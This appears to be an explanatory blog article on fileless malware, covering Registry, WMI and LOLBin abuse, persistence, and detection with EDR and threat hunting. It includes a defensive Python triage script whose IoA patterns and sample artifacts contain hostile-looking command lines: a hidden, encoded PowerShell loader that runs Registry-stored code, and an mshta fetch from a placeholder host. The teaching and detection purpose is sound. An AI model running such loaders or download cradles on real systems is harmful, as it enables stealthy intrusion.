What is “malware without persistent files” and how to detect it with free tools

Last update: 12/12/2025

  • Fileless malware persists in memory or containers such as the Registry and WMI, avoiding classic executables on disk.
  • It relies on legitimate tools (PowerShell, WMI, mshta, rundll32) and on exploits, macros or stolen credentials to evade antivirus.
  • Its detection requires monitoring behavior, memory and IoA, using EDR/XDR, AMSI, ETW and proactive threat hunting.
  • Prevention combines script and macro control, patching, MFA, segmentation, and ongoing training against phishing.

The rise of malware without persistent files has been a real headache for security teams. We are not dealing with the typical virus you get rid of by deleting an executable from disk, but with threats that live in memory, abuse legitimate system tools and, in many cases, leave hardly any usable forensic trace.

This type of attack has become especially popular among advanced groups and cybercriminals seeking to evade traditional antivirus software, steal data, and remain hidden for as long as possible. Understanding how these threats work, which techniques they use, and how to detect them is key for any organization that wants to take cybersecurity seriously today.

What is fileless malware and why is it such a concern?

When we talk about fileless malware, we are not saying that not a single byte touches the disk, but that the malicious code is not stored as a classic executable file on the endpoint's disk. Instead, it runs directly in memory or is hosted in less visible containers such as the Registry, WMI, or scheduled tasks.

In many scenarios, the attacker relies on tools already present in the system (PowerShell, WMI, scripts, signed Windows binaries) to load, decrypt, or execute payloads directly in RAM. This way, it avoids leaving obvious executables that a signature-based antivirus could detect in a normal scan.

Furthermore, part of the attack chain can be "fileless" while another part uses the file system, so it is more accurate to talk about a spectrum of fileless techniques than about a single malware family. That is why there is no single, closed definition, but rather several categories depending on the degree of footprint they leave on the machine.


Main characteristics of malware without persistent files

A key property of these threats is their memory-centric execution. The malicious code is loaded into RAM and executed within legitimate processes, without requiring a stable malicious binary on the hard drive. In some cases, it is even injected into critical system processes for better camouflage.

Another important feature is their unconventional persistence. Many fileless campaigns are purely volatile and disappear after a reboot, but others manage to reactivate using Registry Autorun keys, WMI subscriptions, scheduled tasks, or BITS, so that the "visible" artifact is minimal and the real payload is loaded back into memory each time.

This approach greatly reduces the effectiveness of signature-based detection. Since there is no fixed executable to analyze, what you often see is a perfectly legitimate PowerShell.exe, wscript.exe, or mshta.exe, launched with suspicious parameters or loading obfuscated content.

Finally, many actors combine fileless techniques with other types of malware such as Trojans, ransomware, or adware, resulting in hybrid campaigns that mix the best (and worst) of both worlds: persistence and stealth.

Types of fileless threats according to their footprint on the system

Several security vendors classify "fileless" threats according to the trace they leave on the computer. This taxonomy helps us understand what we are seeing and how to investigate it.

Type I: no visible file activity

At the most stealthy end we find malware that writes absolutely nothing to the file system. The code arrives, for example, through network packets that exploit a vulnerability (such as EternalBlue), is injected directly into memory, and is maintained, for example, as a backdoor in the kernel (DoublePulsar was an emblematic case).

In other scenarios, the infection resides in BIOS firmware, network cards, USB devices, or even subsystems within the CPU. This type of threat can survive operating system reinstalls, disk formatting, and even some complete reboots.

The problem is that most security solutions do not inspect firmware or microcode, and even when they do, remediation is complex. Fortunately, these techniques are usually reserved for highly sophisticated actors and are not the norm in mass attacks.


Type II: Indirect use of files

A second group relies on storing the malicious code in structures on disk, but not as traditional executables: it lives in repositories that mix legitimate and malicious data and are difficult to clean without damaging the system.

Typical examples are scripts stored in the WMI repository, obfuscated strings in Registry keys, or scheduled tasks that launch dangerous commands without a clearly malicious binary. Malware can install these entries directly from the command line or a script and then remain virtually invisible.

Although technically there are files involved (the physical file where Windows stores the WMI repository or the Registry hive), for practical purposes we are talking about fileless activity because there is no obvious executable that can simply be quarantined.

Type III: Requires files to function

The third type includes threats that use files, but in a way that is not very useful for detection. A well-known example is Kovter, which registers random extensions in the Registry so that, when a file with that extension is opened, a script is executed via mshta.exe or a similar native binary.

These decoy files contain irrelevant data, and the real malicious code is retrieved from other Registry keys or internal repositories. Although there is "something" on disk, it is not easy to use it as a reliable indicator of compromise, much less as a direct cleanup mechanism.


Most common entry vectors and points of infection

Beyond footprint classification, it is important to understand how malware without persistent files gets into the system in the first place. In practice, attackers often combine several vectors depending on the environment and the target.

Exploits and vulnerabilities

One of the most direct paths is the abuse of remote code execution (RCE) vulnerabilities in browsers, plugins (like Flash back in the day), web applications, or network services (SMB, RDP, etc.). The exploit injects shellcode that directly downloads or decodes the malicious payload into memory.

In this model, the initial payload can arrive over the network (as with WannaCry-type exploits) or inside a document that the user opens, but the payload is never written to disk as an executable: it is decrypted and executed on the fly from RAM.

Malicious documents and macros

Another heavily exploited avenue is Office documents with macros or DDE, as well as PDFs designed to exploit reader vulnerabilities. A seemingly harmless Word or Excel file may contain VBA code that launches PowerShell, WMI, or other interpreters to download code, execute commands, or inject shellcode into trusted processes.

Here the file on disk is "only" a data container, while the actual vector is the application's internal scripting engine. In fact, many mass spam campaigns have abused this tactic to deploy fileless attacks on corporate networks.

Legitimate scripts and binaries (Living off the Land)

Attackers love the tools that Windows already provides: PowerShell, wscript, cscript, mshta, rundll32, regsvr32, Windows Management Instrumentation, BITS, etc. These signed and trusted binaries can execute scripts, DLLs, or remote content without the need for a suspicious "virus.exe".

By passing malicious code as command-line parameters, embedding it in images, encrypting it and decoding it in memory, or storing it in the Registry, attackers ensure that the antivirus only sees activity from legitimate processes, making detection based solely on files much more difficult.

Compromised hardware and firmware

At an even lower level, advanced attackers can infiltrate BIOS firmware, network cards, hard drives, or even CPU management subsystems (such as Intel ME or AMT). This type of malware runs below the operating system and can intercept or modify traffic without the OS being aware of it.

Although it is an extreme scenario, it illustrates the extent to which a fileless threat can maintain persistence without touching the OS file system, and why classic endpoint tools fall short in these cases.

How a malware attack without persistent files works

At the flow level, a fileless attack is quite similar to a file-based one, but with relevant differences in how the payload is deployed and how access is maintained.


1. Initial access to the system

It all begins when the attacker gains a first foothold: a phishing email with malicious link or attachment, an exploit against a vulnerable application, stolen credentials for RDP or VPN, or even a tampered USB device.

In this phase, attackers use social engineering, malicious redirects, malvertising campaigns, or rogue Wi-Fi attacks to trick the user into clicking where they should not, or they exploit services exposed on the Internet.

2. Execution of malicious code in memory

Once that first entry is gained, the fileless component is triggered: an Office macro launches PowerShell, an exploit injects shellcode, a WMI subscription triggers a script, etc. The goal is to load malicious code directly into RAM, either by downloading it from the Internet or by reconstructing it from embedded data.

From there, the malware can escalate privileges, move laterally, steal credentials, deploy webshells, install RATs, or encrypt data, all of it carried out through legitimate processes to reduce noise.

3. Establishing persistence

Among the usual persistence techniques are:

  • Autorun keys in the Registry that execute commands or scripts at logon.
  • Scheduled tasks that launch scripts, legitimate binaries with parameters, or remote commands.
  • WMI subscriptions that trigger code when certain system events occur.
  • Use of BITS for periodic downloads of payloads from command-and-control servers.

In many cases, the persistent component is minimal and serves only to reinject the malware into memory every time the system starts up or a specific condition is met.

4. Actions on targets and exfiltration

With persistence assured, the attacker focuses on what really interests them: stealing information, encrypting it, manipulating systems, or spying for months. Exfiltration can be done via HTTPS, DNS, covert channels, or legitimate services. In real-world incidents, knowing what to do in the first 24 hours after a hack can make a difference.

In APT attacks, it is common for the malware to remain silent and stealthy for long periods, building additional back doors to ensure access even if part of the infrastructure is detected and cleared.

Capabilities and types of malware that can be fileless

Virtually any malicious function that classic malware can perform can be implemented with a fileless or semi-fileless approach. What changes is not the objective, but the way the code is deployed.

Malware residing only in memory

This category includes payloads that live exclusively in the memory of a process or of the kernel. Modern rootkits, advanced backdoors, or spyware can load into the memory space of a legitimate process and remain there until the system is restarted.

These components are especially difficult to see with disk-oriented tools, and force the use of live memory analysis, EDR with real-time inspection or advanced forensic capabilities.

Windows Registry-based malware

Another recurring technique is to store encrypted or obfuscated code in Registry keys and use a legitimate binary (such as PowerShell, MSHTA, or rundll32) to read, decode, and execute it in memory.

The initial dropper can self-destruct after writing to the Registry, so all that remains is a mixture of seemingly harmless data that activates the threat every time the system starts up or every time a specific file is opened.

Ransomware and fileless Trojans

The fileless approach is not incompatible with very aggressive payloads such as ransomware. There are campaigns that download, decrypt, and execute the entire encryption routine in memory using PowerShell or WMI, without ever leaving the ransomware executable on disk.

Similarly, remote access trojans (RATs), keyloggers, or credential stealers can operate in a semi-fileless manner, loading modules on demand and hosting the main logic in legitimate system processes.

Exploitation kits and stolen credentials

Web exploit kits are another piece of the puzzle: they fingerprint the installed software, select the appropriate exploit, and inject the payload directly into memory, often without saving anything at all to disk.

On the other hand, the use of stolen credentials is a vector that fits very well with fileless techniques: the attacker authenticates as a legitimate user and, from there, abuses native administrative tools (PowerShell Remoting, WMI, PsExec) to deploy scripts and commands that leave no classic malware traces.


Why is fileless malware so difficult to detect?

The underlying reason is that this type of threat is specifically designed to bypass the traditional layers of defense, which are based on signatures, whitelists, and periodic file scans.

If the malicious code is never saved as an executable on disk, or if it hides in mixed containers like WMI, the Registry, or firmware, traditional antivirus software has very little to analyze. Instead of a "suspicious file," what you have are legitimate processes that behave anomalously.

Furthermore, radically blocking tools such as PowerShell, Office macros, or WMI is not viable in many organizations, because they are essential for administration, automation, and daily operations. This forces defenders to tread very carefully.

Some vendors have tried to compensate with quick fixes (generic PowerShell blocking, total macro disabling, cloud-only detection, etc.), but these measures are usually insufficient or excessively disruptive for the business.

Modern strategies for detecting and stopping fileless malware

To confront these threats, it is necessary to go beyond simply scanning files and adopt an approach focused on behavior, real-time telemetry, and deep visibility into the endpoint.

Behavior and memory monitoring

An effective approach involves observing what processes actually do: which commands they execute, which resources they access, which connections they establish, how they relate to each other, etc. Although thousands of malware variants exist, malicious behavior patterns are much more limited. This can also be complemented with advanced detection using YARA.

Modern solutions combine this telemetry with in-memory analytics, advanced heuristics, and machine learning to identify attack chains, even when the code is heavily obfuscated or has never been seen before.

Use of system interfaces such as AMSI and ETW

Windows offers technologies such as the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW), which allow scripts and system events to be inspected at a very low level. Integrating these sources into security solutions makes it easier to detect malicious code just before or during its execution.

In addition, analyzing critical areas (scheduled tasks, WMI subscriptions, boot-time Registry keys, etc.) helps to identify covert fileless persistence that would go unnoticed in a simple file scan.

Threat hunting and indicators of attack (IoA)

Since classic indicators (hashes, file paths) fall short, it is advisable to rely on indicators of attack (IoA), which describe suspicious behaviors and sequences of actions that fit with known tactics.

Threat hunting teams, whether internal or through managed services, can proactively search for lateral movement patterns, abuse of native tools, anomalies in the use of PowerShell, or unauthorized access to sensitive data, detecting fileless threats before they trigger a disaster.
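Whether an artifact comes from a Run key, a scheduled task, a WMI consumer, or a process-creation event, what the analyst ends up with is a command line, so the IoA approach above and the persistence review earlier can share one check. The following is an added example, not code from the original article: it names the launcher, decodes any `-EncodedCommand` payload, and lists matching behavioral IoAs. All sample command lines, key names, and hosts are constructed for the example.

```python
import base64
import re

# Native, signed binaries the article lists as common Living-off-the-Land launchers.
LOLBINS = {"powershell", "pwsh", "wscript", "cscript", "mshta", "rundll32",
           "regsvr32", "wmic", "bitsadmin"}

# IoA name -> case-insensitive pattern matched against the command line plus any
# decoded -EncodedCommand payload. These describe behaviour, not hashes or paths.
IOA_PATTERNS = {
    "encoded_command": r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "stealth_flags": r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass",
    "download_cradle": r"downloadstring|downloadfile|net\.webclient|invoke-webrequest",
    "in_memory_exec": r"\biex\b|invoke-expression|reflection\.assembly",
    "registry_payload": r"\bhk(?:cu|lm):|get-itemproperty",
    "remote_script_host": r"\b(?:mshta|regsvr32|rundll32)(?:\.exe)?\b.*https?://",
}

# Constructed payload for the first sample: it reads code from a Registry value and
# runs it in memory, the pattern the article describes for Registry-based malware.
SAMPLE_PAYLOAD = "IEX (Get-ItemProperty 'HKCU:\\Software\\ExampleKey').Blob"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
# Constructed artifacts (where it was found, command line); not real telemetry.
SAMPLES = [
    ("HKCU Run key", f"powershell.exe -NoP -W Hidden -Enc {SAMPLE_ENCODED}"),
    ("WMI CommandLineEventConsumer", "mshta.exe http://example.invalid/launcher.hta"),
    ("Sysmon EventID 1", 'powershell.exe -NoProfile -Command "Get-Service"'),
    ("Scheduled task action", '"C:\\Program Files\\ExampleVendor\\Updater.exe" /silent'),
]


def decode_encoded_command(cmd):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or invalid."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmd):
    """Name the launcher, decode any hidden payload and list the IoAs that match."""
    m = re.match(r'\s*(?:"([^"]*)"|(\S+))', cmd)
    first = (m.group(1) or m.group(2)).lower()
    launcher = first.rsplit("\\", 1)[-1].removesuffix(".exe")
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else f"{cmd}\n{decoded}"
    ioas = [name for name, pat in IOA_PATTERNS.items() if re.search(pat, text, re.I)]
    if launcher in LOLBINS:
        ioas.insert(0, "lolbin_launcher")
    return {"launcher": launcher, "decoded": decoded, "ioas": ioas, "score": len(ioas)}


def triage(samples=SAMPLES):
    """Score every artifact and return the rows with the highest score first."""
    rows = [{"source": src, **score_command_line(cmd)} for src, cmd in samples]
    return sorted(rows, key=lambda r: r["score"], reverse=True)
```

Calling `triage()` ranks the Run key entry first (encoded, hidden window, in-memory execution of Registry-stored code), puts the mshta remote launcher and the ordinary admin PowerShell session in the middle, and leaves the vendor updater at zero, which is the baseline a hunter wants for filtering legitimate LOLBin use.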

EDR, XDR and SOC 24/7

Modern EDR and XDR platforms (endpoint detection and response, and its extended variant) provide the visibility and correlation needed to reconstruct the complete history of an incident, from the first phishing email to the final exfiltration.

Combined with a 24/7 SOC, they allow not only detection but also automatic containment and remediation of malicious activity: isolating computers, blocking processes, reverting changes to the Registry, or undoing encryption when possible.

Fileless malware techniques have changed the game: simply running an antivirus scan and deleting a suspicious executable is no longer enough. Today, defense involves understanding how attackers exploit vulnerabilities while hiding code in memory, the Registry, WMI, or firmware, and deploying a combination of behavioral monitoring, in-memory analysis, EDR/XDR, threat hunting, and best practices. Realistically reducing the impact of attacks that, by design, try to leave no trace where traditional solutions look requires a holistic and ongoing strategy. In case of compromise, knowing how to repair Windows after a serious infection is essential.
